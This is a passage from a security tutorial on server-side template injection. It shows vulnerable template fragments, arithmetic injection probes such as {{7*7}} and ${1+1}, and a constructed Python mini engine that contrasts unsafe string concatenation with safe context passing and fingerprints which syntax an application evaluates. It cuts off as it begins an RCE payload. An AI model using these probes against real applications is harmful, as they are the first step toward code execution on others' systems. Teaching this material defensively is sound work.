Exploitation
We've reviewed the underlying problem with template engines. Now let's look at how they can be exploited. Consider the following template fragments, which show three common engine syntaxes (a FreeMarker/Velocity-style $name, an ERB/EJS-style <% %> block, and a Twig/Jinja2-style {{ }} expression):

var greet = 'Hello $name';

<ul>
<% for(var i=0; i<data.length; i++) {%>
<li><%= data[i] %></li>
<% } %>
</ul>

<div>
<p> Welcome, {{ username }} </p>
</div>
In this code, the template engine expects a name, which it inserts into the greeting and shows back to the user together with the Welcome string. The application presents this to the user as a form, looking like this:
To test whether it's vulnerable, we send an arithmetic expression written in the template syntax and check whether it is evaluated rather than echoed back literally. For a {{ }} engine the probe is:
{{1+1}}
For a ${ } engine the equivalent probe is ${1+1}.
When the values are sent, the application shows the following:
Hello 2
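To make the detection step concrete, here is an added Python example that is not part of the chapter. It contains a constructed mini template engine that evaluates arithmetic inside {{ }} and ${ } (a stand-in for Twig/Jinja2 and FreeMarker/Velocity, not a real engine), a render_vulnerable function that concatenates user input into the template source exactly as the 'Hello $name' fragment does, a render_safe function that passes the same input as a context variable instead, and a probe function that sends the 7*7 probes from Kettle's methodology and reports which syntax the application evaluated. All function and probe names are assumptions made for this illustration.

```python
import ast
import operator
import re

# Constructed mini "template engine" used only to simulate the behaviour the
# chapter describes. It evaluates arithmetic inside {{ ... }} (Twig/Jinja2
# style) and ${ ... } (FreeMarker/Velocity style) and substitutes context
# variables by name. It is not any real engine.
_EXPR = re.compile(r"\{\{(.*?)\}\}|\$\{(.*?)\}", re.S)
_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}


def _eval(node, ctx):
    """Evaluate a tiny, whitelisted subset of Python expressions: numbers,
    context variable names and + - * / on them. Anything else is rejected."""
    if isinstance(node, ast.Expression):
        return _eval(node.body, ctx)
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
        return node.value
    if isinstance(node, ast.Name):
        return ctx[node.id]
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        return _OPS[type(node.op)](_eval(node.left, ctx), _eval(node.right, ctx))
    raise ValueError("unsupported expression")


def render(template, ctx):
    """Render a template string against a context dict (single pass)."""
    def substitute(match):
        expr = (match.group(1) if match.group(1) is not None else match.group(2)).strip()
        try:
            return str(_eval(ast.parse(expr, mode="eval"), ctx))
        except (ValueError, KeyError, SyntaxError, ZeroDivisionError):
            return match.group(0)  # unknown/unsafe expression: leave it as text
    return _EXPR.sub(substitute, template)


def render_vulnerable(name):
    """The pattern the chapter describes: user input is concatenated into the
    template *source*, so any expression syntax inside it gets evaluated."""
    return render("Hello " + name, {})


def render_safe(name):
    """The corrected pattern: the input is handed to the engine as a context
    variable, so it is printed as data and never parsed as template code."""
    return render("Hello {{ name }}", {"name": name})


# Detection probes (hypothetical names). 7*7 is used instead of 1+1 because a
# lone "2" is more likely to appear in a page by accident than "49".
PROBES = {
    "twig/jinja2": "{{7*7}}",
    "freemarker/velocity": "${7*7}",
    "erb/ejs": "<%= 7*7 %>",
}


def probe(render_fn):
    """Send each probe through the rendering path and return the syntax
    families whose arithmetic was evaluated. The rule mirrors the chapter:
    the result appears in the output and the payload text does not."""
    hits = []
    for family, payload in PROBES.items():
        out = render_fn(payload)
        if "49" in out and payload not in out:
            hits.append(family)
    return hits


if __name__ == "__main__":
    print(render_vulnerable("{{1+1}}"))  # Hello 2
    print(render_safe("{{1+1}}"))        # Hello {{1+1}}
    print(probe(render_vulnerable))      # ['twig/jinja2', 'freemarker/velocity']
    print(probe(render_safe))            # []
```

The vulnerable path reproduces the "Hello 2" result from the chapter, and probe() identifies which expression syntax the simulated engine honours, which is the information you need before choosing an engine-specific payload. The safe path returns the probe text verbatim, which is the behaviour a fixed application should show.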
At this moment, the vulnerability is confirmed. Next we exploit it to determine its impact. I'll use the payloads developed by James Kettle, from his Black Hat USA 2015 presentation Server-Side Template Injection: RCE for the Modern Web App. Let's insert the next line:
{{_self.env...